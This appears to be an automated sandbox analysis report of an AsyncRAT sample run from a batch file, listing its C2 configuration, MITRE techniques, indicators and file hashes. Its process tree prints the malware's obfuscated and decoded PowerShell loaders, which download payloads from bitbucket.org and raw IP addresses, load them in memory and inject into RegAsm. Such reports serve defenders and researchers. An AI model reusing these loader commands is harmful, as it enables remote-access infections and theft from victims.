asyncrat | 5d3e1ec332b5f64b4fed0d5f4dae21008ae05ec7f754f804f813925c4573e12c

Analysis

max time kernel
148s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
17-12-2024 08:35

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

b4ca7ff5efd0278fef09daf595489560.bat
Size

14KB
MD5

b4ca7ff5efd0278fef09daf595489560
SHA1

112847b2bf3d344b10aae9d6bb375de51b0d3b7b
SHA256

5d3e1ec332b5f64b4fed0d5f4dae21008ae05ec7f754f804f813925c4573e12c
SHA512

5e3933d702ecad73bdd81723bd2de7bfb919a10e768a2f1a7e2c90bdb02b6f6ee30a80a9233fe7ca3bc72efb3e7b1f20ff3a6bd05960e172d77bc928418b25b2
SSDEEP

192:SLmONLs0foAt5SVQfFY3vJG5finGma/E0DlNwYaJQnY+1adnG7RQBaFovHSehrvb:/0foNGUvoLwzJQIdnG7R/EHZbGNpM

Score

10^/10

asyncrat default discovery execution rat

Malware Config

Extracted

Family

asyncrat

Version

1.0.7

Botnet

Default

103.125.189.155:8848

Mutex

DcRatMutex_6565

Attributes

delay
1
install
false
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Asyncrat family
asyncrat

Blocklisted process makes network request 4 IoCs

flow	pid	Process
9	2164	powershell.exe
16	2164	powershell.exe
21	2164	powershell.exe
22	3896	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
228	powershell.exe
2164	powershell.exe
3896	powershell.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\b4ca7ff5efd0278fef09daf595489560.bat	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\b4ca7ff5efd0278fef09daf595489560.bat	cmd.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
8	bitbucket.org
9	bitbucket.org

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2164 set thread context of 4804	2164	powershell.exe	91

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings	powershell.exe

Suspicious behavior: AddClipboardFormatListener 2 IoCs

pid	Process
1100	WINWORD.EXE
1100	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
228	powershell.exe
228	powershell.exe
2164	powershell.exe
2164	powershell.exe
3896	powershell.exe
3896	powershell.exe

Suspicious use of AdjustPrivilegeToken 46 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	2840	WMIC.exe
Token: SeSecurityPrivilege	2840	WMIC.exe
Token: SeTakeOwnershipPrivilege	2840	WMIC.exe
Token: SeLoadDriverPrivilege	2840	WMIC.exe
Token: SeSystemProfilePrivilege	2840	WMIC.exe
Token: SeSystemtimePrivilege	2840	WMIC.exe
Token: SeProfSingleProcessPrivilege	2840	WMIC.exe
Token: SeIncBasePriorityPrivilege	2840	WMIC.exe
Token: SeCreatePagefilePrivilege	2840	WMIC.exe
Token: SeBackupPrivilege	2840	WMIC.exe
Token: SeRestorePrivilege	2840	WMIC.exe
Token: SeShutdownPrivilege	2840	WMIC.exe
Token: SeDebugPrivilege	2840	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2840	WMIC.exe
Token: SeRemoteShutdownPrivilege	2840	WMIC.exe
Token: SeUndockPrivilege	2840	WMIC.exe
Token: SeManageVolumePrivilege	2840	WMIC.exe
Token: 33	2840	WMIC.exe
Token: 34	2840	WMIC.exe
Token: 35	2840	WMIC.exe
Token: 36	2840	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2840	WMIC.exe
Token: SeSecurityPrivilege	2840	WMIC.exe
Token: SeTakeOwnershipPrivilege	2840	WMIC.exe
Token: SeLoadDriverPrivilege	2840	WMIC.exe
Token: SeSystemProfilePrivilege	2840	WMIC.exe
Token: SeSystemtimePrivilege	2840	WMIC.exe
Token: SeProfSingleProcessPrivilege	2840	WMIC.exe
Token: SeIncBasePriorityPrivilege	2840	WMIC.exe
Token: SeCreatePagefilePrivilege	2840	WMIC.exe
Token: SeBackupPrivilege	2840	WMIC.exe
Token: SeRestorePrivilege	2840	WMIC.exe
Token: SeShutdownPrivilege	2840	WMIC.exe
Token: SeDebugPrivilege	2840	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2840	WMIC.exe
Token: SeRemoteShutdownPrivilege	2840	WMIC.exe
Token: SeUndockPrivilege	2840	WMIC.exe
Token: SeManageVolumePrivilege	2840	WMIC.exe
Token: 33	2840	WMIC.exe
Token: 34	2840	WMIC.exe
Token: 35	2840	WMIC.exe
Token: 36	2840	WMIC.exe
Token: SeDebugPrivilege	228	powershell.exe
Token: SeDebugPrivilege	2164	powershell.exe
Token: SeDebugPrivilege	3896	powershell.exe
Token: SeDebugPrivilege	4804	RegAsm.exe

Suspicious use of SetWindowsHookEx 7 IoCs

pid	Process
1100	WINWORD.EXE
1100	WINWORD.EXE
1100	WINWORD.EXE
1100	WINWORD.EXE
1100	WINWORD.EXE
1100	WINWORD.EXE
1100	WINWORD.EXE

Suspicious use of WriteProcessMemory 20 IoCs

description	pid	Process	procid_target
PID 4608 wrote to memory of 2840	4608	cmd.exe	86
PID 4608 wrote to memory of 2840	4608	cmd.exe	86
PID 4608 wrote to memory of 1648	4608	cmd.exe	87
PID 4608 wrote to memory of 1648	4608	cmd.exe	87
PID 4608 wrote to memory of 228	4608	cmd.exe	89
PID 4608 wrote to memory of 228	4608	cmd.exe	89
PID 228 wrote to memory of 2164	228	powershell.exe	90
PID 228 wrote to memory of 2164	228	powershell.exe	90
PID 2164 wrote to memory of 4804	2164	powershell.exe	91
PID 2164 wrote to memory of 4804	2164	powershell.exe	91
PID 2164 wrote to memory of 4804	2164	powershell.exe	91
PID 2164 wrote to memory of 4804	2164	powershell.exe	91
PID 2164 wrote to memory of 4804	2164	powershell.exe	91
PID 2164 wrote to memory of 4804	2164	powershell.exe	91
PID 2164 wrote to memory of 4804	2164	powershell.exe	91
PID 2164 wrote to memory of 4804	2164	powershell.exe	91
PID 4608 wrote to memory of 3896	4608	cmd.exe	92
PID 4608 wrote to memory of 3896	4608	cmd.exe	92
PID 3896 wrote to memory of 1100	3896	powershell.exe	94
PID 3896 wrote to memory of 1100	3896	powershell.exe	94

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\b4ca7ff5efd0278fef09daf595489560.bat"
1⤵
- Drops startup file
- Suspicious use of WriteProcessMemory
PID:4608
- C:\Windows\System32\Wbem\WMIC.exe
  wmic cpu get name
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2840
- C:\Windows\system32\find.exe
  find "QEMU"
  2⤵
  PID:1648
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell "$codigo = 'WwBO$GU$d$$u$FM$ZQBy$HY$aQBj$GU$U$Bv$Gk$bgB0$E0$YQBu$GE$ZwBl$HI$XQ$6$Do$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$$g$D0$I$Bb$E4$ZQB0$C4$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$BU$Hk$c$Bl$F0$Og$6$FQ$b$Bz$DE$Mg$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgB1$G4$YwB0$Gk$bwBu$C$$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr$HM$I$B7$C$$c$Bh$HI$YQBt$C$$K$Bb$HM$d$By$Gk$bgBn$Fs$XQBd$CQ$b$Bp$G4$awBz$Ck$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$B3$GU$YgBD$Gw$aQBl$G4$d$$g$D0$I$BO$GU$dw$t$E8$YgBq$GU$YwB0$C$$UwB5$HM$d$Bl$G0$LgBO$GU$d$$u$Fc$ZQBi$EM$b$Bp$GU$bgB0$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$C$$PQ$g$Ec$ZQB0$C0$UgBh$G4$Z$Bv$G0$I$$t$Ek$bgBw$HU$d$BP$GI$agBl$GM$d$$g$CQ$b$Bp$G4$awBz$C$$LQBD$G8$dQBu$HQ$I$$k$Gw$aQBu$Gs$cw$u$Ew$ZQBu$Gc$d$Bo$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgBv$HI$ZQBh$GM$a$$g$Cg$J$Bs$Gk$bgBr$C$$aQBu$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$Ck$I$B7$C$$d$By$Hk$I$B7$C$$cgBl$HQ$dQBy$G4$I$$k$Hc$ZQBi$EM$b$Bp$GU$bgB0$C4$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$K$$k$Gw$aQBu$Gs$KQ$g$H0$I$Bj$GE$d$Bj$Gg$I$B7$C$$YwBv$G4$d$Bp$G4$dQBl$C$$fQ$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$By$GU$d$B1$HI$bg$g$CQ$bgB1$Gw$b$$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$Gw$aQBu$Gs$cw$g$D0$I$B$$Cg$JwBo$HQ$d$Bw$HM$Og$v$C8$YgBp$HQ$YgB1$GM$awBl$HQ$LgBv$HI$Zw$v$HQ$ZQBz$HQ$aQBu$Gc$cwBv$G0$ZQB0$Gg$aQBu$Gc$d$$v$GY$ZwBo$Gg$a$Bo$Gg$a$Bo$Gg$a$Bk$Gc$LwBk$G8$dwBu$Gw$bwBh$GQ$cw$v$G4$ZQB3$F8$aQBt$Gc$LgBq$H$$Zw$/$DU$Mw$3$DY$MQ$y$Cc$L$$g$Cc$a$B0$HQ$c$$6$C8$Lw$x$D$$Mw$u$DI$ZQ$u$DY$Mg$v$HQ$ZQBz$HQ$XwBp$G0$Zw$u$Go$c$Bn$Cc$KQ$7$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$CQ$aQBt$GE$ZwBl$EI$eQB0$GU$cw$g$D0$I$BE$G8$dwBu$Gw$bwBh$GQ$R$Bh$HQ$YQBG$HI$bwBt$Ew$aQBu$Gs$cw$g$CQ$b$Bp$G4$awBz$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$aQBm$C$$K$$k$Gk$bQBh$Gc$ZQBC$Hk$d$Bl$HM$I$$t$G4$ZQ$g$CQ$bgB1$Gw$b$$p$C$$ew$g$CQ$aQBt$GE$ZwBl$FQ$ZQB4$HQ$I$$9$C$$WwBT$Hk$cwB0$GU$bQ$u$FQ$ZQB4$HQ$LgBF$G4$YwBv$GQ$aQBu$Gc$XQ$6$Do$VQBU$EY$O$$u$Ec$ZQB0$FM$d$By$Gk$bgBn$Cg$J$Bp$G0$YQBn$GU$QgB5$HQ$ZQBz$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$HM$d$Bh$HI$d$BG$Gw$YQBn$C$$PQ$g$Cc$P$$8$EI$QQBT$EU$Ng$0$F8$UwBU$EE$UgBU$D4$Pg$n$Ds$I$$k$GU$bgBk$EY$b$Bh$Gc$I$$9$C$$Jw$8$Dw$QgBB$FM$RQ$2$DQ$XwBF$E4$R$$+$D4$Jw$7$C$$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$C$$PQ$g$CQ$aQBt$GE$ZwBl$FQ$ZQB4$HQ$LgBJ$G4$Z$Bl$Hg$TwBm$Cg$J$Bz$HQ$YQBy$HQ$RgBs$GE$Zw$p$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bl$G4$Z$BJ$G4$Z$Bl$Hg$I$$9$C$$J$Bp$G0$YQBn$GU$V$Bl$Hg$d$$u$Ek$bgBk$GU$e$BP$GY$K$$k$GU$bgBk$EY$b$Bh$Gc$KQ$7$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$Gk$Zg$g$Cg$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$C$$LQBn$GU$I$$w$C$$LQBh$G4$Z$$g$CQ$ZQBu$GQ$SQBu$GQ$ZQB4$C$$LQBn$HQ$I$$k$HM$d$Bh$HI$d$BJ$G4$Z$Bl$Hg$KQ$g$Hs$I$$k$HM$d$Bh$HI$d$BJ$G4$Z$Bl$Hg$I$$r$D0$I$$k$HM$d$Bh$HI$d$BG$Gw$YQBn$C4$T$Bl$G4$ZwB0$Gg$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$GI$YQBz$GU$Ng$0$Ew$ZQBu$Gc$d$Bo$C$$PQ$g$CQ$ZQBu$GQ$SQBu$GQ$ZQB4$C$$LQ$g$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$7$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$CQ$YgBh$HM$ZQ$2$DQ$QwBv$G0$bQBh$G4$Z$$g$D0$I$$k$Gk$bQBh$Gc$ZQBU$GU$e$B0$C4$UwB1$GI$cwB0$HI$aQBu$Gc$K$$k$HM$d$Bh$HI$d$BJ$G4$Z$Bl$Hg$L$$g$CQ$YgBh$HM$ZQ$2$DQ$T$Bl$G4$ZwB0$Gg$KQ$7$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$CQ$YwBv$G0$bQBh$G4$Z$BC$Hk$d$Bl$HM$I$$9$C$$WwBT$Hk$cwB0$GU$bQ$u$EM$bwBu$HY$ZQBy$HQ$XQ$6$Do$RgBy$G8$bQBC$GE$cwBl$DY$N$BT$HQ$cgBp$G4$Zw$o$CQ$YgBh$HM$ZQ$2$DQ$QwBv$G0$bQBh$G4$Z$$p$Ds$I$$k$Gw$bwBh$GQ$ZQBk$EE$cwBz$GU$bQBi$Gw$eQ$g$D0$I$Bb$FM$eQBz$HQ$ZQBt$C4$UgBl$GY$b$Bl$GM$d$Bp$G8$bg$u$EE$cwBz$GU$bQBi$Gw$eQBd$Do$OgBM$G8$YQBk$Cg$J$Bj$G8$bQBt$GE$bgBk$EI$eQB0$GU$cw$p$Ds$I$$k$HQ$eQBw$GU$I$$9$C$$J$Bs$G8$YQBk$GU$Z$BB$HM$cwBl$G0$YgBs$Hk$LgBH$GU$d$BU$Hk$c$Bl$Cg$JwB0$GU$cwB0$H$$bwB3$GU$cgBz$Gg$ZQBs$Gw$LgBI$G8$YQBh$GE$YQBh$GE$cwBk$G0$ZQ$n$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bt$GU$d$Bo$G8$Z$$g$D0$I$$k$HQ$eQBw$GU$LgBH$GU$d$BN$GU$d$Bo$G8$Z$$o$Cc$b$Bm$HM$ZwBl$GQ$Z$Bk$GQ$Z$Bk$GQ$YQ$n$Ck$LgBJ$G4$dgBv$Gs$ZQ$o$CQ$bgB1$Gw$b$$s$C$$WwBv$GI$agBl$GM$d$Bb$F0$XQ$g$Cg$JwB0$Hg$d$$u$GM$cgBj$GQ$awBl$GU$Lw$y$DY$Lg$y$D$$MQ$u$D$$Mg$u$DM$M$$x$C8$Lw$6$H$$d$B0$Gg$Jw$s$C$$Jw$w$Cc$L$$g$Cc$UwB0$GE$cgB0$HU$c$BO$GE$bQBl$Cc$L$$g$Cc$UgBl$Gc$QQBz$G0$Jw$s$C$$Jw$w$Cc$KQ$p$H0$fQ$=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string($codigo.replace('$','A')));powershell.exe $OWjuxD"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:228
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/testingsomethingt/fghhhhhhhhhdg/downloads/new_img.jpg?537612', 'http://103.2e.62/test_img.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] ('txt.crcdkee/26.201.02.301//:ptth', '0', 'StartupName', 'RegAsm', '0'))}}"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2164
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:4804
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  pOWeRshElL.eXE -EX bYPasS -nOp -W hiDdeN -eC IAAgAGkAUgBtACAACQAtAFUAUgBpACAAKAAdIGgAdAB0AHAAOgAvAC8AMQAwADMALgAyADAALgAxADAAMgAuADYAMgAvADQAMAA0AC4AZABvAB0gIAAJACAACQArACAACQAdIGMAeAAdICAACQApACAALQBvAFUAVABGAEkATABFACAACQAdICQARQBOAFYAOgBhAHAAUABkAGEAdABBAFwAZABvAG4AaABhAG4AZwAuAGQAbwBjAHgAHSAgAAkAOwAgAAkAaQBuAHYATwBrAEUALQBpAFQAZQBtACAAHSAkAEUATgB2ADoAYQBwAHAAZABBAHQAQQBcAGQAbwBuAGgAYQBuAGcALgBkAG8AYwB4AB0g
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3896
- - C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Roaming\donhang.docx" /o ""
    3⤵
    - Checks processor information in registry
    - Enumerates system info in registry
    - Suspicious behavior: AddClipboardFormatListener
    - Suspicious use of SetWindowsHookEx
    PID:1100

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
f41839a3fe2888c8b3050197bc9a0a05

SHA1
0798941aaf7a53a11ea9ed589752890aee069729

SHA256
224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a

SHA512
2acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
5caad758326454b5788ec35315c4c304

SHA1
3aef8dba8042662a7fcf97e51047dc636b4d4724

SHA256
83e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391

SHA512
4e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693

Download Submit
C:\Users\Admin\AppData\Local\Temp\TCDDF58.tmp\sist02.xsl

Filesize
245KB

MD5
f883b260a8d67082ea895c14bf56dd56

SHA1
7954565c1f243d46ad3b1e2f1baf3281451fc14b

SHA256
ef4835db41a485b56c2ef0ff7094bc2350460573a686182bc45fd6613480e353

SHA512
d95924a499f32d9b4d9a7d298502181f9e9048c21dbe0496fa3c3279b263d6f7d594b859111a99b1a53bd248ee69b867d7b1768c42e1e40934e0b990f0ce051e

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_sbhym43z.2sb.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Office\Recent\index.dat

Filesize
300B

MD5
63f0f1a4724b1c3a825e4700b2f41a6e

SHA1
90cf4128556cd9007d928066629e36e0a883af1c

SHA256
e41414104f3f64ec962f127e27fde8c32a55bdab691a18f6b4c92ad41d87b843

SHA512
08e6c116ac80ed4e8797e436c22b7e3ae2ac189848c9d54d86c0fe30829140dd8a0b26738866e65bda1c3f6b253db500f4dcdd2fc7810348a744d54c73a96c81

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms

Filesize
1KB

MD5
8414d52a889521781020183ec3fb3c29

SHA1
9f824b8bbe3165b5f33642359275032257e889ab

SHA256
9f3e3179beb8bbcee0d636bcaa92499aa09c0dc6336075b58481cb701bbf817c

SHA512
3b7647be52bebef60332cf18e87d329a704df65feb43df99e753491731a1a23123019360c69a4d4471e6fe19d8d03e3198bb00a6305495952e6005382e3e9f73

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms

Filesize
2KB

MD5
dabe5bc77df7a6ae7fefe7fe289aea4a

SHA1
5d51f8032cbf1abded7ce07e0f29d626b0339985

SHA256
39f562c11bf78fc61bbaecc0cf08cabefc21a7c2f85e5c2f99f6fa205b758561

SHA512
0a560b9c6930081e570db8c2d913ed5f121159c66fb945e7855b923076f7b3db3647d3478e34d3d04d22f7dd811c1fd217bc333865947686f55b8d5979fec8f2

Download Submit
C:\Users\Admin\AppData\Roaming\donhang.docx

Filesize
12KB

MD5
ff3620557b65e6e8dd8816643d785c5a

SHA1
d5021480b7cac2066462829c53dc18615642c579

SHA256
85225d3c39423bbfc05e9d52351a9b00670fee3565457e5c3f75caac27ca4de9

SHA512
c2a842bfa4f3caf50d58d5707ca0ad978e04e5111fe20ad468282c216567d25da7022fb7ff2681cb72acc8add3cbcf37000b6bde06ad252758f6ff06c9fb3d34

Download Submit
memory/228-12-0x00007FFC0F440000-0x00007FFC0FF01000-memory.dmp

Filesize
10.8MB

Download
memory/228-33-0x00007FFC0F440000-0x00007FFC0FF01000-memory.dmp

Filesize
10.8MB

Download
memory/228-0-0x00007FFC0F443000-0x00007FFC0F445000-memory.dmp

Filesize
8KB

Download
memory/228-11-0x00007FFC0F440000-0x00007FFC0FF01000-memory.dmp

Filesize
10.8MB

Download
memory/228-7-0x000001E17D260000-0x000001E17D282000-memory.dmp

Filesize
136KB

Download
memory/1100-58-0x00007FFBEB8B0000-0x00007FFBEB8C0000-memory.dmp

Filesize
64KB

Download
memory/1100-55-0x00007FFBED910000-0x00007FFBED920000-memory.dmp

Filesize
64KB

Download
memory/1100-54-0x00007FFBED910000-0x00007FFBED920000-memory.dmp

Filesize
64KB

Download
memory/1100-53-0x00007FFBED910000-0x00007FFBED920000-memory.dmp

Filesize
64KB

Download
memory/1100-57-0x00007FFBEB8B0000-0x00007FFBEB8C0000-memory.dmp

Filesize
64KB

Download
memory/1100-52-0x00007FFBED910000-0x00007FFBED920000-memory.dmp

Filesize
64KB

Download
memory/1100-56-0x00007FFBED910000-0x00007FFBED920000-memory.dmp

Filesize
64KB

Download
memory/2164-24-0x00007FFC0F440000-0x00007FFC0FF01000-memory.dmp

Filesize
10.8MB

Download
memory/2164-29-0x00007FFC0F440000-0x00007FFC0FF01000-memory.dmp

Filesize
10.8MB

Download
memory/2164-25-0x00000202CA1D0000-0x00000202CA1E0000-memory.dmp

Filesize
64KB

Download
memory/2164-22-0x00007FFC0F440000-0x00007FFC0FF01000-memory.dmp

Filesize
10.8MB

Download
memory/2164-23-0x00007FFC0F440000-0x00007FFC0FF01000-memory.dmp

Filesize
10.8MB

Download
memory/3896-51-0x000001F0E96A0000-0x000001F0E98BC000-memory.dmp

Filesize
2.1MB

Download
memory/4804-26-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/4804-91-0x0000000006130000-0x0000000006196000-memory.dmp

Filesize
408KB

Download
memory/4804-90-0x0000000006670000-0x0000000006C14000-memory.dmp

Filesize
5.6MB

Download
memory/4804-83-0x0000000006020000-0x00000000060BC000-memory.dmp

Filesize
624KB

Download